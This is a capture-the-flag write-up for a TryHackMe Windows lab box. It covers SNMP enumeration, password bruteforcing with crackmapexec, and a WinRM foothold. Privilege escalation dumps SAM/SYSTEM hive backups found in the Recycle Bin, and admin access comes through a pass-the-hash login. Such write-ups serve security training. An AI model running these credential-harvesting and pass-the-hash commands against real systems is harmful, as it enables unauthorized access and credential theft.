Year of the Owl — Write-up

Year of the Owl — Write-up


TryHackMe Challenge Link: https://tryhackme.com/room/yearoftheowl



Year of the Owl follows on from Year of the Dog as the next in the New Year series. It is the first Windows box in the series, and is currently rated hard. Like many of my other boxes, Year of the Owl is inactively themed — kudos if you can guess what it’s based on! As my first Windows box, you can think of Year of the Owl as being something of a warm-up (hence the initial rating of Easy/Medium), so keep an eye out for harder Windows challenges coming soon!

Let’s get started.


Enumeration

As always, we begin with an nmap scan:

nmap -p- -vv -T5 -Pn <MACHINE-IP> -oG initial-scan
80/tcp open http syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
443/tcp open https syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3306/tcp open mysql syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5357/tcp open wsdapi syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
Screenshot showing open ports, written in above box.
Open Ports

We have a bunch of ports to play with here, but first up, we can tell make an informed assumption that this is a Windows box from the RDP and WinRM, as well as the lack of response to ICMP packets (hence the -Pn in the nmap command), which indicates the default Windows Defender Firewall is in place.

Before we go any further, let’s follow up with a service scan, just to be sure:

nmap -p 80,139,443,445,3306,3389,5357,5985,47001 -vv -sV -oN common-scan <MACHINE-IP>
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp open ssl/ssl syn-ack ttl 127 Apache httpd (SSL-only mode)
445/tcp open microsoft-ds? syn-ack ttl 127
3306/tcp open mysql? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Screenshot showing open services. Mimics the information in above text box.
Services

Nothing unusual there.

Usually here the webserver would be the most obvious vector to attack. I happen to know that there’s nothing intentionally vulnerable there — or indeed, anywhere here.

For that matter, I have yet to find a way for nmap to discover the service, making this a devil of a foothold — a true shot in the dark.

There is an SNMP server running on UDP port 161. This will give us a tonne of information about the machine.


SNMP

SNMP: The Simple Network Management Protocol. This can provide a wealth of information about our target.

First thing’s first, we need to discover the “Community String” that SNMP is using for verification. To do this we use a tool called onesixtyone:

onesixtyone <MACHINE-IP> -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt

This successfully bruteforces the community string of the server:

Screenshot showing the community string being bruteforced. String itself is blurred.
Community String Bruteforced

Inside the square brackets (blurred), is our community string. Let’s use this to access information from the SNMP server.

To do this we could use a tool such as snmp-check which would dump everything automatically; but that’s no fun. Let’s do this manually using snmp-walk. The information stored by SNMP is in a “tree” format, and is read from left to right. For example, in the string 1.3.2, you would start at node one, then select the third node from the left out of its child nodes. Of its children, you would select the second from the left.

Diagram showing the nodes for 1.3.2
SNMP Example Diagram

The default location of the username list is: 1.3.6.1.4.1.77.1.2.25, making our snmp-walk command:

snmpwalk -c <COMMUNITY> -v1 <MACHINE-IP> 1.3.6.1.4.1.77.1.2.25
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.6.74.97.114.101.116.104 = STRING: "Jareth"
iso.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
iso.3.6.1.4.1.77.1.2.25.1.1.14.68.101.102.97.117.108.116.65.99.99.111.117.110.116 = STRING: "DefaultAccount"
iso.3.6.1.4.1.77.1.2.25.1.1.18.87.68.65.71.85.116.105.108.105.116.121.65.99.99.111.117.110.116 = STRING: "WDAGUtilityAccount"

This output is slightly confusion, but in essence, we have 5 accounts. Of these, only one (Jareth) is not default, so let’s focus on this account from here on out.


Foothold — Jareth

We have a username, but we don’t have a password. Evaluation of the other available services doesn’t reveal anything, so we’re stuck with bruteforcing… or OSINT.

Our first bet is obviously OSINT. This is a rather unusual name, so stick it into Google and see what comes up!

Cursory research reveals that Jareth is the name of the primary antagonist in the 1986 film: Labyrinth. Further research reveals that he is mildly obsessed with the female protagonist. This allows us to guess Jareth’s password without undue difficulty.

That said, we may as well also do the bruteforce, just for the practice:

Let’s use our trusty friend, crackmapexec. We have no guarantee that our user has access to WinRM, so we’ll stick with SMB for now, then see what else we can access:

crackmapexec smb <MACHINE-IP> -u Jareth -p /usr/share/wordlists/rockyou.txt

After a few minutes, we get our answer. We are met with errors when attempting to login over RDP, so we instead try WinRM using evil-winrm, and are able to grab the flag in: user.txt:

evil-winrm -u Jareth -p <PASSWORD> -i <MACHINE-IP>
Logging in over WinRM and taking the user flag. Flag itself is blurred.
user.txt

Privesc

The privesc for this box is made rather harder by the fact that there is antivirus software alive and kicking on the system. This prevents us from using things like winPEAS, which would have been ideal. We could use a PowerShell script such as powerup.ps1. This will execute at least, however, the AV still prevents it from providing any useful information.

We’re doing this manually.

Thinking differences between Windows and Unix — what’s the difference in how the operating system handles deletion requests?

Answer — with Unix it’s a direct unlink with no easy method of recovery. In Windows, the files are unlinked, but a handle is kept in the Recycling Bin until the file itself is overwritten — i.e. files are very easy to recover.

This would be trivial if we had GUI access; however, as it is, we’re stuck in the CLI. After messing around during development of this box, I found that recycled files for each user can be found at C:\$Recycle.bin\<SID>, where SID is for individual users.

Without administrator access we can’t look at anyone else’s SID, so let’s focus on our own.

whoami /all | Select-String -Pattern "jareth" -Context 2,0

This searches the whoami /all output for the line containing our SID:

year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001
Obtaining the SID with the above command
Obtaining the SID

With this, we can now navigate to the Recycling Bin and take a look:

cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001'
Jareth's recycling bin contains backups of the sam and system hives
Contents of Jareth’s Recycling Bin

Yes, there are backups of the SAM and SYSTEM registry hives here, meaning we have everything we need for the classic privesc of using these to dump the password hashes of every user account on the system.

Dumping Hashes

First we need to download these files. Fortunately evil-winrm has a download command for just this purpose. Unfortunately, it won’t work when they’re in the Recycling Bin, so we first copy them to a temp location:

copy sam.bak C:\Windows\Temp\sam.bak
copy system.bak C:\Windows\Temp\system.bak
download C:\Windows\Temp\sam.bak
download C:\Windows\Temp\system.bak
Screenshot demonstrating the above commands
Downloading the hive backups

Switching back to our attacking machine, we can use a tool called pwdump.py to combine the two files, giving us our password list.

We first need to clone the creddump7 repository and install pycrypto with python2:

git clone https://github.com/Neohapsis/creddump7 && cd creddump7
python2 -m pip install pycrypto

Then we can use pwdump.py to get our hashes:

python2 pwdump.py <PATH-TO-SYSTEM-FILE> <PATH-TO-SAM-FILE>
Screenshot demonstrating pwdump.py. Relevant hash is blurred.
Using pwdump.py

Here we have the NT and LM hashes of all user accounts on the system. We are, of course, most interested in the Administrator acccount:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::

Gaining Access

Using the redacted hash, we can attempt a variety of things. The most obvious thing to try would be cracking the hash to obtain a password with which we can log in. This will not work.

Instead, let’s use the hash in a Pass-The-Hash attack over WinRM to gain access to the administrator account:

evil-winrm -u Administrator -H <HASH> -i <MACHINGE-IP>
Screenshot demonstrating a login as the Administrator using a Pass The Hash attack. Flag is obscured.
Obtaining admin.txt

And there we have it — one box successfully, if abruptly, compromised. We have obtained full Administrator access, and taken our last flag.


Footnote

As mentioned at the start of this writeup, Year of the Owl is my first Windows box, so if you happen to have found something unintended, please let me know! I hope that this box was enjoyable, and with any luck, informative. If so, please keep an eye out for more in the future!

Leave a Reply

Your email address will not be published. Required fields are marked *

Enter Captcha Here : *

Reload Image